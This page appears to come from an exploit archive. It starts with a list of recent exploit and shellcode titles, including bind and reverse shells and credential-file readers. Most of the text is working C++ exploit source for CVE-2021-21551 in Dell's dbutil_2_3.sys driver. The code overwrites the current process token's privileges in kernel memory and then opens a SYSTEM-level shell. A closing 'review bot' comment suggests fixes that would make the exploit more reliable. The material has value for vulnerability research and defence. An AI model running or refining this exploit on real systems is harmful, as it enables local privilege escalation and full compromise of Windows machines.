
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - 
Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - 
Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
|
|
# Date: 10/05/2021
|
|
# Exploit Author: Paolo Stagno aka VoidSec
|
|
# Version: <= 2.3
|
|
# CVE: CVE-2021-21551
|
|
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
|
|
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/
|
|
|
|
#include <iostream>
|
|
#include <windows.h>
|
|
#include <winternl.h>
|
|
#include <tlhelp32.h>
|
|
#include <algorithm>
|
|
|
|
#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
|
|
#define SystemHandleInformation 0x10
|
|
#define SystemHandleInformationSize 1024 * 1024 * 2
|
|
|
|
// define the buffer structure which will be sent to the vulnerable driver
|
|
typedef struct Exploit
|
|
{
|
|
uint64_t Field1; // "padding" can be anything
|
|
void* Field2; // where to write
|
|
uint64_t Field3; // must be 0
|
|
uint64_t Field4; // value to write
|
|
};
|
|
|
|
typedef struct outBuffer
|
|
{
|
|
uint64_t Field1;
|
|
uint64_t Field2;
|
|
uint64_t Field3;
|
|
uint64_t Field4;
|
|
};
|
|
|
|
// define a pointer to the native function 'NtQuerySystemInformation'
|
|
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
|
|
ULONG SystemInformationClass,
|
|
PVOID SystemInformation,
|
|
ULONG SystemInformationLength,
|
|
PULONG ReturnLength);
|
|
|
|
// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
|
|
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
|
|
{
|
|
USHORT UniqueProcessId;
|
|
USHORT CreatorBackTraceIndex;
|
|
UCHAR ObjectTypeIndex;
|
|
UCHAR HandleAttributes;
|
|
USHORT HandleValue;
|
|
PVOID Object;
|
|
ULONG GrantedAccess;
|
|
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
|
|
|
|
// define the SYSTEM_HANDLE_INFORMATION structure
|
|
typedef struct _SYSTEM_HANDLE_INFORMATION
|
|
{
|
|
ULONG NumberOfHandles;
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
|
|
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
|
|
|
|
int main(int argc, char** argv)
|
|
{
|
|
|
|
// open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
|
|
HANDLE device = ::CreateFileW(
|
|
L"\\\\.\\DBUtil_2_3",
|
|
GENERIC_WRITE | GENERIC_READ,
|
|
NULL,
|
|
nullptr,
|
|
OPEN_EXISTING,
|
|
NULL,
|
|
NULL);
|
|
if (device == INVALID_HANDLE_VALUE)
|
|
{
|
|
std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";
|
|
|
|
// resolve the address of NtQuerySystemInformation and assign it to a function pointer
|
|
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
|
|
if (!NtQuerySystemInformation)
|
|
{
|
|
std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Resolved NtQuerySystemInformation!\n";
|
|
|
|
// open the current process token - it will be used to retrieve its kernelspace address later
|
|
HANDLE currentProcess = ::GetCurrentProcess();
|
|
HANDLE currentToken = NULL;
|
|
bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, ¤tToken);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Opened a handle to the current process token!\n";
|
|
|
|
// allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
|
|
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
|
|
|
|
// call NtQuerySystemInformation and fill the handleTableInformation structure
|
|
ULONG returnLength = 0;
|
|
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
|
|
|
|
uint64_t tokenAddress = 0;
|
|
// iterate over the system's handle table and look for the handles beloging to our process
|
|
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
|
|
{
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
|
|
// if it finds our process and the handle matches the current token handle we already opened, print it
|
|
if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
|
|
{
|
|
tokenAddress = (uint64_t)handleInfo.Object;
|
|
std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
|
|
}
|
|
}
|
|
|
|
outBuffer buffer =
|
|
{
|
|
0,
|
|
0,
|
|
0,
|
|
0
|
|
};
|
|
|
|
/*
|
|
dt nt!_SEP_TOKEN_PRIVILEGES
|
|
+0x000 Present : Uint8B
|
|
+0x008 Enabled : Uint8B
|
|
+0x010 EnabledByDefault : Uint8B
|
|
|
|
We've added +1 to the offsets to ensure that the low bytes part are 0xff.
|
|
*/
|
|
|
|
// overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
|
|
Exploit exploit =
|
|
{
|
|
0x4141414142424242,
|
|
(void*)(tokenAddress + 0x40),
|
|
0x0000000000000000,
|
|
0xffffffffffffffff
|
|
};
|
|
|
|
// overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
|
|
Exploit exploit2 =
|
|
{
|
|
0x4141414142424242,
|
|
(void*)(tokenAddress + 0x48),
|
|
0x0000000000000000,
|
|
0xffffffffffffffff
|
|
};
|
|
|
|
// overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
|
|
Exploit exploit3 =
|
|
{
|
|
0x4141414142424242,
|
|
(void*)(tokenAddress + 0x50),
|
|
0x0000000000000000,
|
|
0xffffffffffffffff
|
|
};
|
|
|
|
DWORD bytesReturned = 0;
|
|
success = DeviceIoControl(
|
|
device,
|
|
IOCTL_CODE,
|
|
&exploit,
|
|
sizeof(exploit),
|
|
&buffer,
|
|
sizeof(buffer),
|
|
&bytesReturned,
|
|
nullptr);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Successfully overwritten current token 'Present' field!\n";
|
|
|
|
success = DeviceIoControl(
|
|
device,
|
|
IOCTL_CODE,
|
|
&exploit2,
|
|
sizeof(exploit2),
|
|
&buffer,
|
|
sizeof(buffer),
|
|
&bytesReturned,
|
|
nullptr);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";
|
|
|
|
success = DeviceIoControl(
|
|
device,
|
|
IOCTL_CODE,
|
|
&exploit3,
|
|
sizeof(exploit3),
|
|
&buffer,
|
|
sizeof(buffer),
|
|
&bytesReturned,
|
|
nullptr);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
|
|
std::cout << "[+] Token privileges successfully overwritten!\n";
|
|
std::cout << "[+] Spawning a new shell with full privileges!\n";
|
|
|
|
system("cmd.exe");
|
|
|
|
return 0;
|
|
} |
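Review bot: The NTSTATUS returned by the NtQuerySystemInformation call in main is discarded, unlike every other API call in this function, which is checked and returns -1 on failure; with the fixed 2 MiB buffer from SystemHandleInformationSize the query can fail with a length mismatch, the handle loop then scans zeroed heap memory, tokenAddress stays 0, and the three DeviceIoControl calls still run against an address derived from it. Keep the status and fail closed before the writes, `NTSTATUS status = NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);` followed by `if (!NT_SUCCESS(status)) return -1;` and, after the loop, `if (tokenAddress == 0) return -1;`. The loop index `int i` is compared against the ULONG NumberOfHandles; `ULONG i` avoids the signed/unsigned mismatch. handleTableInformation, currentToken and device are never released on any exit path — `HeapFree` and `CloseHandle` before each return, or RAII wrappers, would make main consistent with the RAII-free but otherwise careful error handling it already has. `¤tToken` in the OpenProcessToken call reads as an extraction artifact of `&currentToken` and is worth verifying against the original source.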